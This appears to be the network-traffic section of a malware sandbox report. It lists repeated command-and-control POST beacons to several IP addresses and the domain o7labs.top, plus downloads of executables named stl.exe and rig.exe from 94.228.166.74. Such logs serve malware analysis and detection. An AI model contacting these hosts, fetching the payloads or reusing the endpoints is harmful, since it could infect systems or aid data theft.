Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
Source: global traffic	HTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 46 34 30 43 32 46 39 31 37 41 30 44 43 45 41 46 34 41 30 39 45 33 31 43 38 31 33 30 32 30 33 30 32 35 36 38 31 43 43 31 44 43 44 34 31 36 37 36 36 43 35 41 41 34 34 32 35 38 46 32 32 38 35 43 43 33 30 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5F40C2F917A0DCEAF4A09E31C8130203025681CC1DCD416766C5AA44258F2285CC30
Source: global traffic	HTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 46 34 30 43 32 46 39 31 37 41 30 44 43 45 41 46 34 41 30 39 45 33 31 43 38 31 33 30 32 30 33 30 32 35 36 38 31 43 43 31 44 43 44 34 31 36 37 36 36 43 35 41 41 34 34 32 35 38 46 32 32 38 35 43 43 33 30 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5F40C2F917A0DCEAF4A09E31C8130203025681CC1DCD416766C5AA44258F2285CC30
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
Source: global traffic	HTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 46 34 30 43 32 46 39 31 37 41 30 44 43 45 41 46 34 41 30 39 45 33 31 43 38 31 33 30 32 30 33 30 32 35 36 38 31 43 43 31 44 43 44 34 31 36 37 36 36 43 35 41 41 34 34 32 35 38 46 32 32 38 35 43 43 33 30 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5F40C2F917A0DCEAF4A09E31C8130203025681CC1DCD416766C5AA44258F2285CC30
Source: global traffic	HTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 46 34 30 43 32 46 39 31 37 41 30 44 43 45 41 46 34 41 30 39 45 33 31 43 38 31 33 30 32 30 33 30 32 35 36 38 31 43 43 31 44 43 44 34 31 36 37 36 36 43 35 41 41 34 34 32 35 38 46 32 32 38 35 43 43 33 30 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5F40C2F917A0DCEAF4A09E31C8130203025681CC1DCD416766C5AA44258F2285CC30
Source: global traffic	HTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 46 34 30 43 32 46 39 31 37 41 30 44 43 45 41 46 34 41 30 39 45 33 31 43 38 31 33 30 32 30 33 30 32 35 36 38 31 43 43 31 44 43 44 34 31 36 37 36 36 43 35 41 41 34 34 32 35 38 46 32 32 38 35 43 43 33 30 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5F40C2F917A0DCEAF4A09E31C8130203025681CC1DCD416766C5AA44258F2285CC30
Source: global traffic	HTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 46 34 30 43 32 46 39 31 37 41 30 44 43 45 41 46 34 41 30 39 45 33 31 43 38 31 33 30 32 30 33 30 32 35 36 38 31 43 43 31 44 43 44 34 31 36 37 36 36 43 35 41 41 34 34 32 35 38 46 32 32 38 35 43 43 33 30 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5F40C2F917A0DCEAF4A09E31C8130203025681CC1DCD416766C5AA44258F2285CC30
Source: global traffic	HTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
Source: global traffic	HTTP traffic detected: POST /online/support/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: o7labs.topContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 46 34 30 43 32 46 39 31 37 41 30 44 43 45 41 46 34 41 30 39 45 33 31 43 38 31 33 30 32 30 33 30 32 35 36 38 31 43 43 31 44 43 44 34 31 36 37 36 36 43 35 41 41 34 34 32 35 38 46 32 32 38 35 43 43 33 30 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5F40C2F917A0DCEAF4A09E31C8130203025681CC1DCD416766C5AA44258F2285CC30
Source: global traffic	HTTP traffic detected: POST /online/support/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: o7labs.topContent-Length: 162Cache-Control: no-cacheData Raw: 72 3d 31 37 36 30 31 44 33 39 30 39 39 37 38 31 32 45 39 42 31 46 36 38 45 31 41 39 34 32 37 30 37 35 35 46 39 33 37 46 31 44 39 35 31 35 39 38 41 38 34 35 39 39 35 34 32 34 46 45 31 34 35 30 39 44 35 39 30 44 35 31 32 34 46 45 38 41 39 38 38 31 41 33 36 36 44 37 36 38 42 46 41 38 36 30 32 38 37 30 45 43 36 43 45 34 44 46 32 42 43 35 32 38 35 46 42 33 45 30 37 46 45 35 41 32 35 43 41 32 46 32 32 35 30 30 44 34 37 41 35 33 46 43 43 36 34 44 37 36 46 46 32 38 35 33 42 43 35 41 37 36 Data Ascii: r=17601D390997812E9B1F68E1A94270755F937F1D951598A845995424FE14509D590D5124FE8A9881A366D768BFA8602870EC6CE4DF2BC5285FB3E07FE5A25CA2F22500D47A53FCC64D76FF2853BC5A76
Source: global traffic	HTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
Source: global traffic	HTTP traffic detected: GET /wp-includes/stl.exe HTTP/1.1Host: 94.228.166.74
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 46 34 30 43 32 46 39 31 37 41 30 44 43 45 41 46 34 41 30 39 45 33 31 43 38 31 33 30 32 30 33 30 32 35 36 38 31 43 43 31 44 43 44 34 31 36 37 36 36 43 35 41 41 34 34 32 35 38 46 32 32 38 35 43 43 33 30 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5F40C2F917A0DCEAF4A09E31C8130203025681CC1DCD416766C5AA44258F2285CC30
Source: global traffic	HTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
Source: global traffic	HTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 46 34 30 43 32 46 39 31 37 41 30 44 43 45 41 46 34 41 30 39 45 33 31 43 38 31 33 30 32 30 33 30 32 35 36 38 31 43 43 31 44 43 44 34 31 36 37 36 36 43 35 41 41 34 34 32 35 38 46 32 32 38 35 43 43 33 30 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5F40C2F917A0DCEAF4A09E31C8130203025681CC1DCD416766C5AA44258F2285CC30
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /online/support/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: o7labs.topContent-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 31 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000012001&unit=246122658369
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
Source: global traffic	HTTP traffic detected: GET /wp-includes/rig.exe HTTP/1.1Host: 94.228.166.74
Source: global traffic	HTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 46 34 30 43 32 46 39 31 37 41 30 44 43 45 41 46 34 41 30 39 45 33 31 43 38 31 33 30 32 30 33 30 32 35 36 38 31 43 43 31 44 43 44 34 31 36 37 36 36 43 35 41 41 34 34 32 35 38 46 32 32 38 35 43 43 33 30 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5F40C2F917A0DCEAF4A09E31C8130203025681CC1DCD416766C5AA44258F2285CC30
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
